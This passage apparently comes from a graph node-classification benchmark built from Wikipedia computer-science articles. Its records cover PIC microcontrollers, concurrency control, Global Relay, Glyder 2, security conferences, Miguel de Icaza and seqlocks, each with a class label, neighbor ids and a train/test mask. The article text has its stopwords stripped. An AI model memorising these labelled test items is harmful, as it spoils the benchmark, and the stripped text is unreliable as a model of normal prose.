12-bit wide code memory 32-byte register file tiny two level deep call stack represented pic10 series well pic12 pic16 devices baseline devices available 6-pin 40-pin packages generally first 7 9 bytes register file special-purpose registers remaining bytes general purpose ram pointers implemented using register pair writing address fsr file select register indf indirect f register becomes alias addressed register banked ram implemented bank number selected high 3 bits fsr affects register numbers 16–31 registers 0–15 global affected bank select bits limited register space 5 bits 4 rarely read registers assigned addresses written special instructions codice_1 codice_2 rom address space 512 words 12 bits may extended 2048 words banking codice_3 codice_4 instructions specify low 9 bits new code location additional high-order bits taken status register note call instruction includes 8 bits address may specify addresses first half 512-word page lookup tables implemented using computed codice_4 assignment pcl register table codice_6 instructions baseline core support interrupts i/o must polled enhanced baseline variants interrupt support four-level call stack pic10f32x devices feature mid-range 14-bit wide code memory 256 512 words 64-byte sram register file 8-level deep hardware stack devices available 6-pin smd 8-pin dip packages two pins unused one input three i/o pins available complex set interrupts available clocks internal calibrated high-frequency oscillator 16 mhz choice selectable speeds via software 31 khz low-power source devices feature 14-bit wide code memory improved 8-level deep call stack instruction set differs little baseline devices two additional opcode bits allow 128 registers 2048 words code directly addressed additional miscellaneous instructions two additional 8-bit literal instructions add subtract mid-range core available majority devices labeled pic12 pic16 first 32 bytes register space allocated special-purpose registers remaining 96 bytes used general-purpose ram banked ram used high 16 registers 0x70–0x7f global important special-purpose registers including status register holds ram bank select bits global registers fsr indf low 8 bits program counter pcl pc high preload register pclath master interrupt control register intcon pclath register supplies high-order instruction address bits 8 bits supplied write pcl register 11 bits supplied codice_4 codice_3 instruction sufficient address available rom space 17 series never became popular superseded pic18 architecture however see clones 17 series recommended new designs availability may limited users improvements earlier cores 16-bit wide opcodes allowing many new instructions 16-level deep call stack pic17 devices produced packages 40 68 pins 17 series introduced number important new features significant limitation ram space limited 256 bytes 26 bytes special function registers 232 bytes general-purpose ram awkward bank-switching models supported 2000 microchip introduced pic18 architecture unlike 17 series proven popular large number device variants presently manufacture contrast earlier devices often programmed assembly c become predominant development language 18 series inherits features instructions 17 series adding number important new features ram space 12 bits addressed using 4-bit bank select register 8-bit offset instruction additional access bit instruction selects bank 0 =0 bank selected bsr =1 1-level stack also available status wreg bsr registers saved every interrupt may restored return interrupts disabled may also used subroutine call/return setting bit appending fast instruction auto increment/decrement feature improved removing control bits adding four new indirect registers per fsr depending indirect file register accessed possible postdecrement postincrement preincrement fsr form effective address adding w fsr advanced pic18 devices extended mode available makes addressing even favorable compiled code pic18 devices still developed 2017 fitted cip core independent peripherals 2001 microchip introduced dspic series chips entered mass production late 2004 microchip first inherently 16-bit microcontrollers pic24 devices designed general purpose microcontrollers dspic devices include digital signal processing capabilities addition although still similar earlier pic architectures significant enhancements features dspics programmed c using microchip xc16 compiler formerly called c30 variant gcc instruction rom 24 bits wide software access rom 16-bit words even words hold least significant 16 bits instruction odd words hold significant 8 bits high half odd words reads zero program counter 23 bits wide least significant bit always 0 22 modifiable bits instructions come two main varieties important operations add xor shifts etc allowing forms first like classic pic instructions operation specified f register i.e first 8k ram single accumulator w0 destination select bit selecting updated result w registers memory-mapped f operand may w register second form conventional allowing three operands may 16 w registers destination one sources also support addressing modes allowing operand memory pointed w register november 2007 microchip introduced pic32mx family 32-bit microcontrollers based mips32 m4k core device programmed using microchip mplab c compiler pic32 mcus variant gcc compiler first 18 models currently production pic32mx3xx pic32mx4xx pin pin compatible share peripherals set pic24fxxga0xx family 16-bit devices allowing use common libraries software hardware tools today starting 28 pin small qfn packages high performance devices ethernet usb otg full family range mid-range 32-bit microcontrollers available pic32 architecture brought number new features microchip portfolio including november 2013 microchip introduced pic32mz series microcontrollers based mips m14k core pic32mz series include 2015 microchip released pic32mz ef family using updated mips m5150 warrior m-class processor 2017 microchip introduced pic32mz da family featuring integrated graphics controller graphics processor 32mb ddr2 dram june 2016 microchip introduced pic32mm family specialized low-power low-cost applications pic32mm features core-independent peripherals sleep modes 500 na 4 x 4 mm packages pic32mm microcontrollers use mips technologies m4k 32-bit mips32 processor meant low power consumption limited 25 mhz key advantage support 16bits instructions mips making program size much compact 40 microchip introduced pic32mk family 2017 specialized motor control industrial control industrial internet things iiot multi-channel applications pic architecture characterized multiple attributes distinction memory space register space ram serves job memory registers ram usually referred register file simply registers pics set registers function general-purpose ram special-purpose control registers on-chip hardware resources also mapped data space addressability memory varies depending device series pic devices banking mechanism extend addressing additional memory later series devices feature move instructions cover whole addressable space independent selected bank earlier devices register move achieved accumulator implement indirect addressing file select register fsr indirect register indf used register number written fsr reads writes indf actually register pointed fsr later devices extended concept post- pre- increment/decrement greater efficiency accessing sequentially stored data also allows fsr treated almost like stack pointer sp external data memory directly addressable except pic18 devices high pin count code space generally implemented on-chip rom eprom flash rom general provision storing code external memory due lack external memory interface exceptions pic17 select high pin count pic18 devices pics handle address data 8-bit chunks however unit addressability code space generally data space example pics baseline pic12 mid-range pic16 families program memory addressable wordsize instruction width i.e 12 14 bits respectively contrast pic18 series program memory addressed 8-bit increments bytes differs instruction width 16 bits order clear program memory capacity usually stated number single-word instructions rather bytes pics hardware call stack used save return addresses hardware stack software-accessible earlier devices changed 18 series devices hardware support general-purpose parameter stack lacking early series greatly improved 18 series making 18 series architecture friendly high-level language compilers pic instructions vary 35 instructions low-end pics 80 instructions high-end pics instruction set includes instructions perform variety operations registers directly accumulator literal constant accumulator register well conditional execution program branching operations bit setting testing performed numbered register bi-operand arithmetic operations always involve w accumulator writing result back either w operand register load constant necessary load w moved another register older cores register moves needed pass w changed high-end cores pic cores skip instructions used conditional execution branching skip instructions skip bit set skip bit set cores pic18 unconditional branch instructions conditional jumps implemented conditional skip opposite condition followed unconditional branch skips also utility conditional execution immediate single following instruction possible skip instructions example instruction sequence skip skip b c execute c true b false 18 series implemented shadow registers registers save several important registers interrupt providing hardware support automatically saving processor state servicing interrupts general pic instructions fall five classes architectural decisions directed maximization speed-to-cost ratio pic architecture among first scalar cpu designs still among simplest cheapest harvard architecture instructions data come separate sources simplifies timing microcircuit design greatly benefits clock speed price power consumption pic instruction set suited implementation fast lookup tables program space lookups take one instruction two instruction cycles many functions modeled way optimization facilitated relatively large program space pic e.g 4096 × 14-bit words 16f690 design instruction set allows embedded constants example branch instruction target may indexed w execute retlw named return literal w. interrupt latency constant three instruction cycles external interrupts synchronized four-clock instruction cycle otherwise one instruction cycle jitter internal interrupts already synchronized constant interrupt latency allows pics achieve interrupt-driven low-jitter timing sequences example video sync pulse generator longer true newest pic models synchronous interrupt latency three four cycles following stack limitations addressed pic18 series still apply earlier cores paged program memory two page sizes worry one call goto another computed goto typically used table lookups example pic16 call goto 11 bits addressing page size 2048 instruction words computed gotos add pcl page size 256 instruction words cases upper address bits provided pclath register register must changed every time control transfers pages pclath must also preserved interrupt handler several commercial compilers available 2008 microchip released c compilers c18 c30 line 18f 24f 30/33f processors 2013 microchip offers xc series compilers use mplab x microchip eventually phase older compilers c18 recommends using xc series compilers new designs risc instruction set pic assembly language code make overall flow difficult comprehend judicious use simple macros increase readability pic assembly language example original parallax pic assembler spasm macros hide w make pic look like two-address machine macro instructions like codice_17 move data address address b codice_18 add data address data address b also hides skip instructions providing three-operand branch macro instructions codice_19 compare b jump dest equal pic devices generally feature within series still many device variants depending hardware resources chip features first generation pics eprom storage almost completely replaced chips flash memory likewise original 12-bit instruction set pic1650 direct descendants superseded 14-bit 16-bit instruction sets microchip still sells otp one-time-programmable windowed uv-erasable versions eprom based pics legacy support volume orders microchip website lists pics electrically erasable otp uv erasable windowed versions chips ordered f picmicro part number generally indicates picmicro uses flash memory erased electronically conversely c generally means erased exposing die ultraviolet light possible windowed package style used exception rule pic16c84 uses eeprom therefore electrically erasable l name indicates part run lower voltage often frequency limits imposed parts designed specifically low voltage operation within strict range 3 3.6 volts marked j part number parts also uniquely i/o tolerant accept 5 v inputs microchip provides freeware ide package called mplab x includes assembler linker software simulator debugger also sell c compilers pic10 pic12 pic16 pic18 pic24 pic32 dspic integrate cleanly mplab x free versions c compilers also available features free versions optimizations disabled 60 days several third parties develop c language compilers pics many integrate mplab and/or feature ide fully featured compiler picbasic language program pic microcontrollers available melabs inc. mikroelektronika offers pic compilers c basic pascal programming languages graphical programming language flowcode exists capable programming 8- 16-bit pic devices generating pic-compatible c code exists numerous versions free demonstration complete professional edition proteus design suite able simulate many popular 8 16-bit pic devices along circuitry connected pic schematic program simulated developed within proteus mplab development tool devices called programmers traditionally used get program code target pic pics microchip currently sells feature icsp circuit serial programming and/or lvp low voltage programming capabilities allowing pic programmed sitting target circuit microchip offers programmers/debuggers mplab pickit series mplab icd4 mplab real ice current programmers debuggers professional engineering pickit 3 low-cost programmer debugger line hobbyists students many higher end flash based pics also self-program write program memory process known bootloading demo boards available small bootloader factory programmed used load user programs interface rs-232 usb thus obviating need programmer device alternatively bootloader firmware available user load onto pic using icsp programming bootloader onto pic user reprogram device using rs232 usb conjunction specialized computer software advantages bootloader icsp faster programming speeds immediate program execution following programming ability debug program using cable many programmers pic microcontrollers ranging extremely simple designs rely icsp allow direct download code host computer intelligent programmers verify device several supply voltages many complex programmers use pre-programmed pic send programming commands pic programmed intelligent type programmer needed program earlier pic models mostly eprom type support in-circuit programming third party programmers range plans build self-assembly kits fully tested ready-to-go units simple designs require pc low-level programming signalling typically connect serial parallel port consist simple components others programming logic built typically use serial usb connection usually faster often built using pics control newer pic devices feature icd in-circuit debugging interface built cpu core allows interactive debugging program conjunction mplab ide mplab icd mplab real ice debuggers communicate interface using icsp interface debugging system comes price however namely limited breakpoint count 1 older devices 3 newer devices loss i/o exception surface mount 44-pin pics dedicated lines debugging loss on-chip features devices on-chip debug support due cost lack pins larger chips also debug module debug devices special -icd version chip mounted daughter board provides dedicated ports required debug chips able operate one type chip use selectable jumpers daughter board allows broadly identical architectures feature chip peripheral devices replaced single -icd chip example 12f690-icd function one six different parts features one five chip peripherals microchip offers three full in-circuit emulators mplab ice2000 parallel interface usb converter available newer mplab ice4000 usb 2.0 connection recently real ice usb 2.0 connection tools typically used conjunction mplab ide source-level interactive debugging code running target pic projects may utilize real time operating systems freertos avix rtos urtos salvo rtos similar libraries task scheduling prioritization open source project serge vakulenko adapts 2.11bsd pic32 architecture name retrobsd brings familiar unix-like operating system including onboard development environment microcontroller within constraints onboard hardware parallax produced series picmicro-like microcontrollers known parallax sx currently discontinued designed architecturally similar pic microcontrollers used original versions basic stamp sx microcontrollers replaced pic several subsequent versions product parallax sx 8-bit risc microcontrollers using 12-bit instruction word run fast 75 mhz 75 mips include 4096 12-bit words flash memory 262 bytes random access memory eight bit counter support logic software library modules emulate i²c spi interfaces uarts frequency generators measurement counters pwm sigma-delta a/d converters interfaces relatively easy write existing modules modified get new features russian pkk milandr produces microcontrollers using pic17 architecture 1886 series program memory consists 64kb flash memory 1886ve2u 8kb eeprom 1886ve5u 1886ве5у 1886ve5u 1886ве5у 1886ve7u 1886ве7у specified military temperature range -60 °c +125 °c hardware interfaces various parts include usb i2c spi well a/d d/a converters 1886ve3u 1886ве3у contains hardware accelerator cryptographic functions according gost 28147-89 even radiation-hardened chips designations 1886ve8u 1886ве8у 1886ve10u 1886ве10у elan microelectronics corp. taiwan make line microcontrollers based pic16 architecture 13-bit instructions smaller 6-bit ram address space holtek semiconductor make large number cheap microcontrollers low 8.5 cents quantity 14-bit instruction set strikingly similar pic16 many ultra-low-cost otp microcontrollers asian manufacturers found low-cost consumer electronics based pic architecture modified form clones target baseline parts pic16c5x/pic12c50x microchip attempted sue manufacturers copying particularly egregious without success",
    "neighbors": [
      4098,
      7170,
      1029,
      7173,
      8711,
      9739,
      10767,
      4124,
      1058,
      10786,
      10796,
      11314,
      6207,
      7234,
      7235,
      1100,
      2638,
      10833,
      7774,
      10851,
      7269,
      1126,
      6247,
      6250,
      6252,
      6253,
      11374,
      6256,
      7281,
      5237,
      9851,
      11395,
      8327,
      1170,
      4246,
      1175,
      9366,
      9371,
      4773,
      682,
      9391,
      2224,
      9911,
      11447,
      9402,
      10945,
      9928,
      9452,
      9964,
      1776,
      760,
      780,
      6925,
      783,
      7445,
      8481,
      2345,
      11054,
      8501,
      2874,
      5457,
      9044,
      9563,
      1894,
      10603,
      372,
      3451,
      3467,
      9638,
      6057,
      426,
      938,
      5040,
      9151,
      5059,
      9163,
      6607,
      2517,
      9685,
      4569,
      3050,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7446,
    "label": 1,
    "text": "Concurrency_control:concurrency control information technology computer science especially fields computer programming operating systems multiprocessors databases concurrency control ensures correct results concurrent operations generated getting results quickly possible computer systems software hardware consist modules components component designed operate correctly i.e. obey meet certain consistency rules components operate concurrently interact messaging sharing accessed data memory storage certain component consistency may violated another component general area concurrency control provides rules methods design methodologies theories maintain consistency components operating concurrently interacting thus consistency correctness whole system introducing concurrency control system means applying operation constraints typically result performance reduction operation consistency correctness achieved good possible efficiency without reducing performance reasonable levels concurrency control require significant additional complexity overhead concurrent algorithm compared simpler sequential algorithm example failure concurrency control result data corruption torn read write operations comments concurrency control database management systems dbms e.g. bernstein et al 1987 weikum vossen 2001 transactional objects related distributed applications e.g. grid computing cloud computing ensures database transactions performed concurrently without violating data integrity respective databases thus concurrency control essential element correctness system two database transactions executed time overlap access data e.g. virtually general-purpose database system consequently vast body related research accumulated since database systems emerged early 1970s well established concurrency control theory database systems outlined references mentioned serializability theory allows effectively design analyze concurrency control methods mechanisms alternative theory concurrency control atomic transactions abstract data types presented lynch et al 1993 utilized theory refined complex wider scope less utilized database literature classical theory theory pros cons emphasis insight extent complementary merging may useful ensure correctness dbms usually guarantees serializable transaction schedules generated unless serializability intentionally relaxed increase performance cases application correctness harmed maintaining correctness cases failed aborted transactions always happen many reasons schedules also need recoverability abort property dbms also guarantees effect committed transactions lost effect aborted rolled back transactions remains related database overall transaction characterization usually summarized acid rules databases become distributed needed cooperate distributed environments e.g. federated databases early 1990 cloud computing currently effective distribution concurrency control mechanisms received special attention concept database transaction atomic transaction evolved order enable well understood database system behavior faulty environment crashes happen time recovery crash well understood database state database transaction unit work typically encapsulating number operations database e.g. reading database object writing acquiring lock etc abstraction supported database also systems transaction well defined boundaries terms program/code executions included transaction determined transaction programmer via special transaction commands every database transaction obeys following rules support database system i.e. database system designed guarantee transactions runs concept atomic transaction extended years become business transactions actually implement types workflow atomic however also enhanced transactions typically utilize atomic transactions components transactions executed serially i.e. sequentially overlap time transaction concurrency exists however concurrent transactions interleaving operations allowed uncontrolled manner unexpected undesirable results may occur high-performance transactional systems need run transactions concurrently meet performance requirements thus without concurrency control systems neither provide correct results maintain databases consistently main categories concurrency control mechanisms different categories provide different performance i.e. different average transaction completion rates throughput depending transaction types mix computing level parallelism factors selection knowledge trade-offs available category method chosen provide highest performance mutual blocking two transactions one blocks results deadlock transactions involved stalled reach completion non-optimistic mechanisms blocking prone deadlocks resolved intentional abort stalled transaction releases transactions deadlock immediate restart re-execution likelihood deadlock typically low blocking deadlocks aborts result performance reduction hence trade-offs categories many methods concurrency control exist implemented within either main category major methods many variants cases may overlap combined major concurrency control types utilized conjunction methods include common mechanism type database systems since early days 1970s strong strict two-phase locking ss2pl also called rigorous scheduling rigorous 2pl special case variant two-phase locking 2pl commitment ordering co pessimistic spite long name historical reasons idea ss2pl mechanism simple release locks applied transaction transaction ended ss2pl rigorousness also name set schedules generated mechanism i.e. ss2pl rigorous schedules ss2pl rigorousness property concurrency control mechanisms firstly need operate correctly i.e. maintain transaction integrity rules related concurrency application-specific integrity rule scope transactions running concurrently thus integrity entire transactional system correctness needs achieved good performance possible addition increasingly need exists operate effectively transactions distributed processes computers computer networks subjects may affect concurrency control recovery replication correctness common major goal concurrency control mechanisms generating schedules serializability property without serializability undesirable phenomena may occur e.g. money may disappear accounts generated nowhere serializability schedule means equivalence resulting database values serial schedule transactions i.e. transactions sequential overlap time thus completely isolated concurrent access two transactions data possible serializability considered highest level isolation among database transactions major correctness criterion concurrent transactions cases compromised relaxed forms serializability allowed better performance e.g. popular snapshot isolation mechanism meet availability requirements highly distributed systems see eventual consistency application correctness violated relaxation e.g. relaxation allowed money transactions since relaxation money disappear appear nowhere almost implemented concurrency control mechanisms achieve serializability providing conflict serializablity broad special case serializability i.e. covers enables serializable schedules impose significant additional delay-causing constraints implemented efficiently comment general area systems term recoverability may refer ability system recover failure incorrect/forbidden state within concurrency control database systems term received specific meaning concurrency control typically also ensures recoverability property schedules maintaining correctness cases aborted transactions always happen many reasons recoverability abort means committed transaction schedule read data written aborted transaction data disappear database upon abort parts incorrect database state reading data violates consistency rule acid unlike serializability recoverability compromised relaxed case since relaxation results quick database integrity violation upon aborts major methods listed provide serializability mechanisms none general form automatically provides recoverability special considerations mechanism enhancements needed support recoverability commonly utilized special case recoverability strictness allows efficient database recovery failure excludes optimistic implementations e.g. strict co sco optimistic implementation semi-optimistic ones comment note recoverability property needed even database failure occurs database recovery failure needed rather needed correctly automatically handle transaction aborts may unrelated database failure recovery fast technological development computing difference local distributed computing low latency networks buses blurring thus quite effective utilization local techniques distributed environments common e.g. computer clusters multi-core processors however local techniques limitations use multi-processes threads supported multi-processors multi-cores scale often turns transactions distributed ones need span multi-processes cases local concurrency control techniques scale well database systems become distributed started cooperate distributed environments e.g. federated databases early 1990s nowadays grid computing cloud computing networks smartphones transactions become distributed distributed transaction means transaction spans processes may span computers geographical sites generates need effective distributed concurrency control mechanisms achieving serializability property distributed system schedule see distributed serializability global serializability modular serializability effectively poses special challenges typically met regular serializability mechanisms originally designed operate locally especially due need costly distribution concurrency control information amid communication computer latency known general effective technique distribution commitment ordering disclosed publicly 1991 patented commitment ordering commit ordering co raz 1992 means transactions chronological order commit events kept compatible respective precedence order co require distribution concurrency control information provides general effective solution reliable high-performance scalable distributed global serializability also heterogeneous environment database systems transactional objects different concurrency control mechanisms co indifferent mechanism utilized since interfere transaction operation scheduling mechanisms control determines order commit events thus co enables efficient distribution mechanisms also distribution mix different local mechanisms achieving distributed global serializability existence solution considered unlikely 1991 many experts also later due misunderstanding co solution see quotations global serializability important side-benefit co automatic distributed deadlock resolution contrary co virtually techniques combined co prone distributed deadlocks also called global deadlocks need special handling co also name resulting schedule property schedule co property chronological order transactions commit events compatible respective transactions precedence partial order ss2pl mentioned variant special case co thus also effective achieve distributed global serializability also provides automatic distributed deadlock resolution fact overlooked research literature even co publication well strictness thus recoverability possessing desired properties together known efficient locking based implementations explains ss2pl popularity ss2pl utilized efficiently achieve distributed global serializability since 1980 become de facto standard however ss2pl blocking constraining pessimistic proliferation distribution utilization systems different traditional database systems e.g. cloud computing less constraining types co e.g. optimistic co may needed better performance comments unlike serializability distributed recoverability distributed strictness achieved efficiently straightforward way similarly way distributed co achieved database system applied locally employ vote ordering strategy two-phase commit protocol 2pc raz 1992 page 307 mentioned distributed ss2pl including distributed strictness recoverability distributed commitment ordering serializability automatically employs needed vote ordering strategy achieved globally employed locally local database system known utilized many years matter fact locality defined boundary 2pc participant raz 1992 design concurrency control mechanisms often influenced following subjects systems prone failures handling recovery failure must properties generated schedules dictated concurrency control mechanism may affect effectiveness efficiency recovery example strictness property mentioned section recoverability often desirable efficient recovery high availability database objects often replicated updates replicas database object need kept synchronized may affect way concurrency control done e.g. gray et al 1996 multitasking operating systems especially real-time operating systems need maintain illusion tasks running top running time even though one tasks really running given moment due limitations hardware operating system running multitasking fairly simple tasks independent however several tasks try use resource tasks try share information lead confusion inconsistency task concurrent computing solve problem solutions involve locks similar locks used databases risk causing problems deadlock solutions non-blocking algorithms read-copy-update",
    "neighbors": [
      9224,
      8201,
      2068,
      1049,
      5658,
      9248,
      9762,
      6184,
      10793,
      10286,
      1083,
      11324,
      9286,
      2632,
      9290,
      8788,
      10326,
      7767,
      4194,
      9828,
      10340,
      8808,
      2669,
      5745,
      11377,
      7802,
      1146,
      3196,
      10389,
      9366,
      4255,
      4263,
      10413,
      9397,
      7868,
      6850,
      2246,
      4308,
      2780,
      734,
      10471,
      6383,
      7412,
      9466,
      10495,
      1801,
      2314,
      8979,
      7446,
      11030,
      4376,
      5401,
      5403,
      2344,
      2345,
      7992,
      1341,
      10048,
      2369,
      5441,
      5953,
      5956,
      3398,
      4423,
      8008,
      3914,
      2901,
      10069,
      8539,
      11620,
      1382,
      9069,
      9075,
      10632,
      2456,
      9112,
      10137,
      1435,
      7581,
      9631,
      9634,
      1447,
      7080,
      10675,
      3004,
      3517,
      5566,
      9663,
      3529,
      2514,
      10201,
      987,
      4065,
      3560,
      6124,
      2544,
      4592,
      10737,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 7447,
    "label": 7,
    "text": "Global_Relay:global relay global relay technology services company providing software-as-a-service electronic message archiving e.g. email archiving instant messaging compliance supervision solutions focus highly regulated industries global relay privately held employee controlled outside venture funding global relay founded 1999 warren roy duff reid eric parusel company developed one first cloud email archiving services use records management tool architecture design construction industries several years later company realized perfect technology wrong industry company shifted focus financial sector began selling archiving services broker-dealers investment advisors hedge funds banks email electronic messages increasingly became standard methods business communication new market emerged secure way retain messages business legal regulatory purposes beginning 2001 accounting scandals major us corporations enron worldcom arthur andersen brought regulatory compliance issues sharper focus financial firms also public companies wake scandals regulators sec financial industry regulatory authority finra formerly nasd well newly introduced sarbanes-oxley legislation began requiring financial firms system electronic message recordkeeping supervision — paper records global relay built customer base combining technology compliance legal audit/ediscovery services company gained widespread adoption among banks investment advisors broker-dealers hedge funds private equity firms 2007 global relay entered worldwide exclusive partnership thomson reuters archiving compliance thomson reuters messenger eikon new message types adopted financial industry global relay developed ability capture retain compliance public instant messaging aol instant messenger yahoo messenger msn messenger googletalk first message type followed bloomberg messaging mobile messaging blackberry android sms blackberry pin call logs ice chat cme/pivot social media linkedin twitter facebook integrations well company archiving system built in-house global relay development teams global relay markets global relay archive compliance necessity tool boost end-user productivity since company acquisition mobile software firm 2008 released apps every major mobile platform including iphone ipad blackberry android — allowing users find retrieve archived messages location global relay strategy future centers upon transition offering back office tools message archiving also providing front office communication services global relay message company cloud-based enterprise platform instant messaging collaboration designed meet regulatory requirements finance industry global relay also process developing next generation core archiving product provide increased scalability capacity process index messaging data companies hundreds thousands users additional key component global relay competitive strategy construction data centers allowing global relay fully control components technology stack including software workstations servers data centers property global relay 4-megawatt west coast data center located north vancouver british columbia capacity 200 racks 5000 servers environmentally friendly facility employs evaporative cooling technology eliminate need mechanical air conditioning thereby dramatically reducing electricity usage global relay significant player cloud-based messaging archiving industries recent articles cite client base 18,000 including 22 world 25 biggest banks 61 us hedge funds.1,2 revenue growth last five years rapid global relay ranked 197th fastest-growing software company north america 2012 data security paramount global relay financial customer base company annually engages kpmg provide independent verification security reliability internal controls january 2012 global relay announced five-year 1-million commitment become title sponsor operator global relay gastown grand prix 2016 global relay gastown grand prix professional cycling criterium race vancouver british columbia november 2012 global relay introduced global relay bridge gap philanthropic fund support up-and-coming canadian cyclists global relay pledged 400,000 four years support cyclists ages 19 25 providing funding coaching travel equipment five veteran professional canadian riders board members global relay bridge gap ryan anderson andrew pinfold routley svein tuft erinne willock",
    "neighbors": [
      2208,
      10090,
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 7448,
    "label": 2,
    "text": "Glyder_2:glyder 2 glyder 2 ios adventure game developed glu mobile released december 16 2009 game rating 93 metacritic based 5 critic reviews appsmile said replay value high game perfect killing minutes hours. slidetoplay wrote glyder 2 must flight game enthusiasts want take easy without pinned red-flashing control panel seating area full screaming passengers. pocketgameruk said glyder 2 one-way ticket fantastic gameplay combination self-motivated exploration dynamic goals ensuring first class flight. 148apps said technically game fantastic graphics great controls responsive well done soundtrack fantastic real hick-up found occasional heavy frame dropping mushroom world sporelle. toucharcade said glyder 2 delivers fanciful aerial questing experience iphone ipod touch like forerunner highly enjoyable game challenging time relaxing.",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 7449,
    "label": 4,
    "text": "Computer_security_conference:computer security conference computer security conference convention individuals involved computer security generally serve meeting places system network administrators hackers computer security experts common activities hacker conventions may include general security conferences might held non-profit/not-for-profit/for-profit professional associations individuals informal group individuals security product vendor companies hacker conference also known hacker con convention hackers serve meeting places phreakers hackers security professionals actual events time-spans details various themes conventions depends specific convention attended also perceived reputation typically actual details given convention couched mild secrecy due legality certain panels well willingness attendees explain law enforcement less computer-savvy individuals see hacker definition controversy common topics include wardriving lockpicking corporate network security personal rights freedoms new technologies well general 'geek motifs may also contests general collaborative events hackathons one facet hacker conferences tends differentiate many hackercons general computer security conferences evolution conference badge many conferences use fairly standard paper/plastic badge identify attendees name many hacker con evolved use non-traditional badges electronic pcb led lcd screens include wifi advanced often hidden functionality include games identify individual sometimes promoting group identity regional/local group affiliation spurred creation so-called badgelife different individuals organizations local hacker groups may design create sell otherwise distribute separate badge attendees wear addition conference badge badges may purchased may earned completing challenge conference one rarest desirable badges defcon black badge use badges traditionally associated defcon use spread conferences",
    "neighbors": [
      8320,
      2690,
      1540,
      5636,
      10756,
      3342,
      10894,
      6040,
      10392,
      1182,
      688,
      10290,
      5427,
      7222,
      3643,
      6588,
      10875,
      9791,
      7491,
      5575,
      6473,
      9293,
      9424,
      9688,
      3290,
      7899,
      4956,
      4445,
      8671,
      2275,
      8165,
      10216,
      1525,
      7547,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7450,
    "label": 2,
    "text": "Miguel_de_Icaza:miguel de icaza miguel de icaza born november 23 1972 mexican-american programmer best known starting gnome mono xamarin projects de icaza born mexico city studied mathematics national autonomous university mexico unam dropped getting degree work came family scientists father physicist mother biologist started writing free software 1992 one earliest pieces software wrote linux midnight commander file manager text-mode file manager also one early contributors wine project worked david s. miller linux sparc port wrote several video network drivers port well libc ports platform later worked extending linux mips run sgi indy computers wrote original x drivers system ingo molnar wrote original software implementation raid-1 raid-5 drivers linux kernel summer 1997 interviewed microsoft job internet explorer unix team work sparc port lacked university degree required obtain work h-1b visa said interview tried persuade interviewers free ie code even netscape browser de icaza started gnome project federico mena august 1997 create completely free desktop environment component model linux unix-like operating systems also created gnome spreadsheet program gnumeric 1999 de icaza along nat friedman co-founded helix code gnome-oriented free software company employed large number gnome hackers 2001 helix code later renamed ximian announced mono project led de icaza goal implement microsoft new .net development platform linux unix-like platforms august 2003 ximian acquired novell de icaza vice president developer platform may 2011 de icaza started xamarin replace monotouch mono android novell bought attachmate projects abandoned shortly afterwards xamarin novell reached agreement xamarin took development sales products february 2016 xamarin announced acquired microsoft one month later microsoft build conference announced mono project would relicensed mit visual studio would include xamarin even free versions without restrictions xamarin sdks would opensourced de icaza endorsed microsoft office open xml ooxml document standard disagreeing lot widespread criticism open source free-software community also developed mono – free open-source alternative microsoft .net framework – gnome raised much disagreement due patents microsoft holds .net framework de icaza criticized richard stallman software freedom day 2009 labeled traitor free software community icaza responded blog stallman remark believes world possibility open discussions ways improve pool open source free software august 2012 de icaza criticized linux desktop killed apple de icaza specifically criticized generally developer-focused culture lack backward compatibility fragmentation among various linux distributions march 2013 de icaza announced personal blog regularly used macos instead linux desktop computing 2014 joined anders hejlsberg stage announcements .net foundation open sourcing microsoft c compiler serves board directors .net foundation miguel de icaza received free software foundation 1999 award advancement free software mit technology review innovator year award 1999 named one time magazine 100 innovators new century september 2000 early 2010 received microsoft mvp award march 2010 named fifth powerful voices open source mindtouch de icaza cameo appearances 2001 motion pictures antitrust code married brazilian maria laura soares da silva maria laura de icaza 2003 de icaza critical actions state israel towards palestinians middle east blogged subject de icaza granted us citizenship january 2015",
    "neighbors": [
      1026,
      11394,
      2955,
      5644,
      6413,
      10255,
      4367,
      8848,
      657,
      9872,
      1939,
      3859,
      2581,
      3478,
      5397,
      6808,
      10642,
      11155,
      1822,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      6694,
      8354,
      11559,
      2603,
      5931,
      8364,
      8621,
      1328,
      4402,
      9908,
      1717,
      823,
      2109,
      11069,
      10687,
      3649,
      7234,
      708,
      10822,
      3015,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      11643,
      4437,
      6489,
      3802,
      1501,
      8157,
      4831,
      1632,
      2400,
      8671,
      9696,
      11232,
      5095,
      4459,
      1007,
      10991,
      7793,
      1394,
      1396,
      3189,
      3573,
      1399,
      8059
    ],
    "mask": "None"
  },
  {
    "node_id": 7451,
    "label": 3,
    "text": "Seqlock:seqlock seqlock short sequential lock special locking mechanism used linux supporting fast writes shared variables two parallel operating system routines semantics stabilized version 2.5.59 present 2.6.x stable kernel series seqlocks developed stephen hemminger originally called frlocks based earlier work andrea arcangeli first implementation x86-64 time code needed synchronize user space possible use real lock reader-writer consistent mechanism avoids problem writer starvation seqlock consists storage saving sequence number addition lock lock support synchronization two writers counter indicating consistency readers addition updating shared data writer increments sequence number acquiring lock releasing lock readers read sequence number reading shared data sequence number odd either occasion writer taken lock data read may changed sequence numbers different writer changed data read either case readers simply retry using loop read even sequence number reader never blocks may retry write progress speeds readers case data modified since acquire lock would traditional read-write lock also writers wait readers whereas traditional read-write locks leading potential resource starvation situation number readers writer must wait readers two factors seqlocks efficient traditional read-write locks situation many readers writers drawback much write activity reader slow might livelock readers may starve also noted technique work data contains pointers writer could invalidate pointer reader already followed case using read-copy-update synchronization preferred first applied system time counter updating time interrupt updates time day may many readers time operating system internal use applications writes relatively infrequent occur one time bsd timecounter code instance appears use similar technique one subtle issue using seqlocks time counter impossible step debugger retry logic trigger time debugger slow enough make read race occur always",
    "neighbors": [
      7992,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 7452,
    "label": 2,
